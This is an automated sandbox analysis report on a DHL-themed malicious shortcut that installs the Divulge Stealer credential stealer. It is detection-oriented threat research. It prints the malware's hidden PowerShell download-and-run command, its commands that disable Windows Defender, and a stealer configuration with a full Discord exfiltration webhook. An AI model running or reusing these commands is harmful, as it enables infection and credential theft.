Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL AWB-documents.lnk

Overview

General Information

Sample name:DHL AWB-documents.lnk
Analysis ID:1579624
MD5:5e3249c32a70dc3b8d108c8bfe50c4d0
SHA1:724787b337134448fd07cc626f9fa7edf978db3f
SHA256:b3be3371628c3633b544d0e73a2b0dfe93faef9f49cea25b7b88d7a9d9a1bccf
Tags:DHLlnkuser-abuse_ch
Infos:

Detection

Divulge Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Divulge Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • powershell.exe (PID: 6872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • setup_x86.exe (PID: 1220 cmdline: "C:\Users\user\Downloads\setup_x86.exe" MD5: E09F55D421CB45340A8C97C217BA56CF)
      • powershell.exe (PID: 3224 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 2848 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 4024 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 3380 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 3552 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 4044 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2828 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 1404 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2084 cmdline: "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"Webhook Url": "https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG", "Version": "v2.0", "Mutex": "sW7ROjkdVeQ0ALYye0hE"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\Downloads\setup_x86.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scrJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.2836477844.000001F318682000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: setup_x86.exe PID: 1220JoeSecurity_DivulgeStealerYara detected Divulge StealerJoe Security
            Process Memory Space: setup_x86.exe PID: 1220JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              SourceRuleDescriptionAuthorStrings
              3.0.setup_x86.exe.1f316940000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\setup_x86.exe" , ParentImage: C:\Users\user\Downloads\setup_x86.exe, ParentProcessId: 1220, ParentProcessName: setup_x86.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', ProcessId: 3224, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\setup_x86.exe" , ParentImage: C:\Users\user\Downloads\setup_x86.exe, ParentProcessId: 1220, ParentProcessName: setup_x86.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 4024, ProcessName: powershell.exe
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\Downloads\setup_x86.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\setup_x86.exe" , ParentImage: C:\Users\user\Downloads\setup_x86.exe, ParentProcessId: 1220, ParentProcessName: setup_x86.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', ProcessId: 3224, ProcessName: powershell.exe
                Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr
                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
                Source: C:\Users\user\Downloads\setup_x86.exeAvira: detection malicious, Label: HEUR/AGEN.1307507
                Source: 3.0.setup_x86.exe.1f316940000.0.unpackMalware Configuration Extractor: Divulge Stealer {"Webhook Url": "https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG", "Version": "v2.0", "Mutex": "sW7ROjkdVeQ0ALYye0hE"}
                Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scrReversingLabs: Detection: 87%
                Source: C:\Users\user\Downloads\setup_x86.exeReversingLabs: Detection: 87%
                Source: DHL AWB-documents.lnkVirustotal: Detection: 46%Perma Link
                Source: DHL AWB-documents.lnkReversingLabs: Detection: 34%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scrJoe Sandbox ML: detected
                Source: C:\Users\user\Downloads\setup_x86.exeJoe Sandbox ML: detected
                Source: DHL AWB-documents.lnkJoe Sandbox ML: detected
                Source: C:\Users\user\Downloads\setup_x86.exeCode function: 3_2_00007FFD34A82B43 CryptUnprotectData,3_2_00007FFD34A82B43
                Source: C:\Users\user\Downloads\setup_x86.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\setup_x86.exe.logJump to behavior
                Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unkno